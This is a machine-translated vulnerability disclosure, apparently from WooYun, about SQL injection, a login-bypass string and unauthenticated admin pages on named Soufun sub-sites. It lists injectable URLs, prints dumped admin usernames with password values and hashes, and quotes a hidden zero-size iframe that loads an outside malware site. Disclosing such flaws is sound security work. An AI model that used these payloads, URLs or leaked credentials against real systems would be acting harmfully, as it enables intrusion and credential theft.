Soufun sub-station background management verification bypass and SQL Injection

Brief description: the backend management of a sub-station in Soufun can bypass verification.
Http://dg.soufun.com/market/zhongjie/admin/
1. SQL injection in the logon box. You can construct a query statement to bypass verification, for example, 'or ''='' or ''='
2. Unauthorized access:
Http://dg.soufun.com/market/zhongjie/admin/news.asp
Http://dg.soufun.com/market/zhongjie/admin/com.asp
3. If SQL Injection exists on the page, you can obtain the Administrator account and password.
Http://dg.soufun.com/market/zhongjie/showcom.asp? Id = 23
Proof of vulnerability: 'or' = 'log on directly,
Unauthorized access:
Http://dg.soufun.com/market/zhongjie/admin/news.asp
Http://dg.soufun.com/market/zhongjie/admin/com.asp
SSQL injection: http://dg.soufun.com/market/zhongjie/showcom.asp? Id = 23
 
 
 

 
 
 
Solution: filter parameters and add verification for unauthorized access pages
This background should have been deprecated and can be deleted


Brief description: SQL Injection exists on multiple pages of Soufun.
Description: SQL Injection exists on multiple pages, and the content in some databases + Multiple SQL injections + the value of the backend after the injection is 20Rank.
Multiple sub-stations, multiple pages, improper filtering of multiple parameters lead to multiple SQL injections, and the Management passwords in multiple databases are not encrypted
If an SQL statement has at least 3 rank, I think it is easier to use 50 rank.
The main site contains over 50% ASP programs with SQL query statements in sub-stations, with fewer ASPX and PHP programs.
Some pages have been embedded with malicious content.
Conservatively estimated that the probability of website intrusion is about 80%. We recommend that you perform a large inspection on the website, including sub-stations, to delete unwanted junk pages and programs.
 
Proof of vulnerability: http://cq.soufun.com/cqfjh/manage/findkfs.asp? Realid = 59
Http://cq.soufun.com/cqfjh/manage/findoneloupan.asp? Houseid = 65
Http://dg.soufun.com/market/zhongjie/showcom.asp? Id = 23
Http://suzhou.soufun.com/market/lijingyuan/zxdt_xianshi.asp? Id = 10
Http://shdesign.soufun.com/mj/shenggao/showitem.asp? Id = 11
Http://shdesign.soufun.com/hy/08/jindi01/shownews.asp? Id = 90
Http://esf.sz.soufun.com/asp/zhaoping/oneseeker.asp? Id = 42364
Http://nb.soufun.com/ad/zzk/zpxx/zp_more.asp? Ypid = 1, 212
Http://changchun.soufun.com/market/article/list.asp? Articleid = 65
Http://cs.soufun.com/market/eles/news_view.asp? Newsid = 92
Admin www.2cto.com
Id | pass | user |
1 | 8370396 | changsha_newhouse |
Http://bj.soufun.com/market/yueguizhuangyuan/news/view.asp? Id = 5
Admin
Id | password | username |
9 | 27c8f0e73f4d7f48 | admin |
11 | b3506677e4c55e91 | zhang |
 
...
 
Too many
Solution: perform a major check on the website to delete unwanted junk pages and programs.
Filter parameters



Multiple pages under the sub-station http://cs.soufun.com/are inserted with malicious content, and sqlinjection exists.
For example: http://cs.soufun.com/market/eles/news_view.asp? Newsid = 92
Framework connection for websites containing malware
 
<Iframe src = "http://www.gzlyqyjt.com/inc/" width = '0' height = '0'> </iframe>
 
...
In addition, multiple pages under this substation have SQL injection, including the above link.
 
Vulnerability proof: malicious content:
 
 
 

 
 
 
 
 
SQL Injection:
Table: admin
Table segment: id | pass | user |
Data: 1 | 8 ***** 6 | changsha_newhouse |
Solution: Delete unnecessary programs, filter parameters, and delete malicious code...




Author Ambulong @ wooyun